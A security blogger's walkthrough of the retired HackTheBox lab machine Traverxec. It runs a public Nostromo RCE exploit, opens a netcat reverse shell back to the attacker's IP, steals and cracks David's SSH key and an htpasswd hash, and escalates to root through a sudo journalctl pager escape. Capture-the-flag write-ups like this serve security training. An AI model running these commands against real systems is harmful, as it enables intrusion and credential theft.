Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Traverxec

Name: Traverxec
Release Date: 16 Nov 2019
Retire Date: 11 Apr 2020
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
x4nt0n 00 days, 00 hours, 26 mins, 49 seconds
kolokokop 00 days, 01 hours, 06 mins, 28 seconds
Creator: jkr
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165

 
$ nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 22:59 EDT
Nmap scan report for 10.10.10.165
Host is up (0.079s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 301.98 seconds

We've got HTTP and SSH on a their standard ports and we know that HTTP is running Nostromo 1.9.6. There's nothing special on the page itself and Gobuster shows us nothing interesting.  Searchsploit for Nostromo 1.9.6 gives us a quick RCE route to take.  Let's start there.

 
kali@kali:~$ searchsploit nostromo
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                     | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                   | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                     | linux/remote/35466.sh
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
kali@kali:~$

Let's grab that python exploit, run it and see what happens.

 

python 47837.py 10.10.10.165 80 whoami

Awesome.  The RCE works.  Now let's turn that into a shell by making the command an netcat callback.  Use the standard nc -lvnp 4444 on your machine and run the exploit as:

 

python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444"

 

and we have a www-data shell.  Checking the home directory, we see a "david" folder, but no dice listing the contents. Looking around, we do see that nostromo is running in /var/nostromo and the configs are in /var/nostromo/conf.  (Completely unrelated, but is anyone else getting an "Aliens" vibe here?  I mean "THE Nostromo" C'mon! I can't be the only one)  Anyways.  Checking out the /var/nostromo/conf/nhttpd.conf file and the .htpasswd files give us some interesting information.

 

www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
cat ./.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

 

from nhttpd.conf

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

 

Changing back into david's home folder, I try to list out the public_www folder and actually get a result of a protected-file-area, which has a backup of ssh identities.  Time to see if I can snag that file.

 

$ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz kali@10.10.14.7:/home/kali/Desktop/Traverxec/sshbackups.tgz

Now, I use tar -xvf to extract the files.

 

tar -xvf sshbackups.tgz

 

We get these files.

 

home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

 

SSH as David time.  Aaaaannnnddd ROADBLOCK.  Of course the RSA key has a passphrase.  No big deal.  I can kick that into John and hopefully crack it with rockyou.txt.

 

kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt

 

In case you're wondering, I went back a few dirs so that all my Traverxec files are in the same place.  Personal preference, but you do you. We run it through ssh2john and then john and the passphrase is <insert requisite drumroll> "hunter"

So, let's try SSH again now that we know the passphrase.  No surprise, but it is successful and we actually have a "save point" if you will.  Grab the user flag while you're here and let's start enumerating to root.  The LinEnum output is in the CTB file as always.  In David's home folder is a bin folder with a server-stats.sh script:

 

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

 

I believe I should be able to modify that final line that runs journalctl as sudo by exploiting the less pager command and a GTFPbin.  If I run the last line prior to the | it should invoke the "less" command at which point I can expand the window and then !/bin/bash and grab a root shell.  Let's test that out.

Amazingly, that worked!  Another box down.